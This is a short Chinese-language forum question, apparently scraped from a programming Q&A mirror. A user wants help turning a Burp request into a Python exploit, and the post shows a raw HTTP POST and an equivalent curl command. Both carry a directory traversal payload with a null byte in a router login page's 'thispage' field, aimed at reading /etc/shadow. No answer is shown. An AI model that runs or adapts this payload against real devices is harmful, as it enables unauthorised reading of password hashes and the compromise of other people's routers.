因此,我试图为一个基本的burp请求编写一个基本的python漏洞,但是我无法理解。在
我的要求是:
POST /index.php HTTP/1.1
Host: <ip>:<port>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://<ip>:<port>/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=&USERDBUsers.Password=&thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm&button.login.USERDBUsers.router_status=button.login.USERDBUsers.router_status%3dLogin&Login.userAgent=
我试着在下面的脚本中得到同样的输出。在
^{pr2}$curl漏洞是:
curl -i -s -k -X $'POST' \
-H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Referer: https://<ip>:<port>/index.php' -H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=&USERDBUsers.Password=&thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm&button.login.USERDBUsers.router_status=button.login.USERDBUsers.router_status%3dLogin&Login.userAgent=' \
$'https://<ip>:<port>/index.php'
目前没有回答
相关问题 更多 >
编程相关推荐